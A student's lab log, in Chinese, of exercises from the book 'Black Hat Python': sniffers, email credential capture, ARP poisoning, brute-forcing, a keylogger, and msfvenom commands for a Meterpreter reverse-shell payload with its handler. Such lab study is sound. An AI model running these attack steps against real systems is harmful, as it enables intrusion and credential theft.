python代码见码云:20179204_gege
第2章 网络基础
- tcp客户端(tcpclient.py),可以看到百度返回的HTTP响应。
- udp客户端(udpclient.py)
首先先用nc监听一下9999端口,-u就是udp模式,哈哈发过去了,最后打印出了ip和端口,nc没发数据过来,可能就没收到数据。
现在就可以比较一下tcp和udp的区别了,最核心的是udp不用连接,因为是无状态的协议
发送和接受的函数也是有区别的,通过实验发现recv和recvfrom的参数是接收几个字符的意思。
- tcp服务器(tcpserver.py tcpclient1.py)
- 取代netcat (bhnet.py)
打开一个终端
./bhnet.py -l -p 9999 -c
打开新终端./bhnet.py -t localhost -p 9999
输入ctrl+d
创建一个tcp代理proxy (proxy.py)
设置浏览器代理127.0.0.1:80 sudo python ./proxy.py 127.0.0.1 80 www.baidu.com 80 True 打开浏览器
.
通过paramiko使用ssh (bh_sshcmd.py bh_sshRcmd.py bh_sshserver.py)
参考博客Python黑帽子——通过Paramiko使用SSHpip install paramiko 生成密钥 ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key 添加用户 useradd -d /home/qing qing passwd qing 赋予ssh权限 vi /etc/ssh/sshd_config,添加 AllowUsers:qing
测试、运行结果
python bh_sshcmd.py python bh_sshserver.py 127.0.0.1 80 python bh_sshRcmd.py 可以在服务器端输入一条命令mkdir ddr新建一个ddr文件夹
ssh隧道 (rforward.py bh_sshserver.py)建议在终端同时输一下
不设置浏览器代理 终端1:python rforward.py 127.0.0.1 -p 8080 -r 127.0.0.1:80 --user gege --password gege 终端2:python bh_sshserver.py 127.0.0.1 80 终端3:python bh_sshRcmd.py 刷新浏览器127.0.0.1:8080
第3章 网络:原始套接字和流量嗅探
- linux上的嗅探器 (sniffer.py)注意修改代码中的ip地址
- linux下测试解码ip层 (sniffer_ip_header_decode)注意修改代码中的ip地址
- 解码ICMP (sniffer_with_icmp.py)注意修改代码中的ip地址
type0 code0 说明Echo Reply——回显应答(Ping应答)
解码ICMP
注:回显请求与回显应答是两种icmp报文类型,类型号分别是8和0,这两种类型下都只有一种代码0。这两种icmp报文属查询报文,主要用于测试网络中另一台主机是否可达,向欲测试主机发送一份ICMP回显请求,并等待返回ICMP回显应答,如果能收到,表明该主机可达。
- 子网扫描器 (sniffer.py)注意修改代码中的ip地址和子网地址
第4章 网络:原始套接字和流量嗅探
- 简单嗅探器(mail_test.py)
- 窃取email认证(mail_sniffer)
需要用命令行模拟邮件登陆(当然我用的是错误的用户名和密码,所以下图是不能登录成功的,但已经说明抓取成功),这里以登陆网易的pop3服务器为例 telnet pop3.163.com 110
利用scapy进行arp缓存投毒(arptest.py)需要修改代码中两个ip地址
攻击机kali,目标机win2k。 kali上ping攻击机。 在win上输入命令ipconfig /all,arp -a检查arp缓存。 首先要开启对网关和目标ip地址的流量进行转发的功能: echo 1 > /proc/sys/net/ipv4/ip_forward
处理pcap文件(pic_carver1.py)“人脸识别”
安装opencv: apt-get install python-opencv python-numpy python-scipy wget http://eclecti.cc/files/2008/03/haarcascade_frontalface_alt.xml
第5章 web攻击
- 开源web应用安装(web_app_mapper.py)
web_app_mapper1.py是课本的代码 web_app_mapper2.py。这里作者应该是利用开源应用的本地文件目录信息去访问目标网站的对应目录,看看哪些目录是跟官方的一样的,举个例子:比如有没有install目录。
暴力破解目录和文件位置(content_bruter.py),其中字典文件all.txt
暴力破解html表格认证(joomla_killer.py)
这个要搭建apache服务器,单纯做不出。
第6章 扩展burp代理
- burp模糊测试(bhp_fuzzer.py)
打开burpsuite,environment 选择jar文件路径
extender——add——bup_fuzzer.py(课本97步骤)
- 在burp中利用bing服务(bhp_bing.py)课本105步骤
- 利用网站内容生成密码字典(bhp_wordlist.py)课本111步骤
第7章 基于GitHub的命令和控制
- 基于github通信的木马(git_trojan.py)失败。
第8章 windows下木马的常用功能(沙盒检测没做)
- 有趣的键盘记录(winxpattacker下运行,C:Documents and SettingsAdministrator文件夹下keylogger.py)
安装过程:
IDLE——run module
无论键盘输入什么,都会被记录下来。
截取屏幕快照(winxpattacker下运行,screenshotter.py)
截图保存在c:WINDOWSTempscreenshot.bmp下。python方式的shellcode执行【kali下输入metasploit命令行,winxp下运行需要改代码,windows弹出计算器calc.exe】(shell_exec.py)
kali:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.43.62.77 LPORT=1234 -f raw -o win_backdoor.raw base64 -i win_backdoor.raw > shellcode.bin python -m SimpleHTTPServer metasploit下: use exploit/multi/handler set LHOST 10.43.62.77 set LPORT 1234 exploit
winxppython运行
kaliexecute -f calc.exe
,在win下查看结果:
第9章 玩转浏览器
- 基于浏览器的中间人攻击
- 利用IE的COM组件自动化技术窃取数据
本章只实现了创建一个简单快速的RSA公私钥生成脚本(keygen.py)
第10章 windows系统提权(代码插入没做)
- 利用WMI监视进程(process_monitor.py)
直接在cmd命令行下python运行,日志只显示在process_monitor_log.csv里了。
- windows系统的令牌权限(process_monitor1.py)
- 赢得竞争(file_monitor1.py)
第11章 自动化攻击取证(本章没成功)
抓取口令的哈希值
直接代码注入(code_inject.py)失败